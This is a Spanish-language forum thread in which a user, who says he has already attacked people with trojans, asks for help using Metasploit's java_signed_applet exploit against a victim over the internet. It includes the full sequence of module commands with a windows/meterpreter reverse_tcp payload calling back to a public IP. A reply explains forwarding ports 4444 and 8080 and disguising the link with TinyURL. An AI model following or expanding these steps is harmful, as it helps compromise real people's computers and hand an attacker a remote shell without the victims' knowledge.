buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada



ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor




pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA


exploit

Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Acabo de probarla en red local y el avast salta con el exploit (se veia venir...). Al del video le debe salir porque el que infecta seguramente no tenga antivirus ni nada por el estilo.

en serio salta el antivurus o no salta ?

Ultimamente el foro esta lleno de lamers...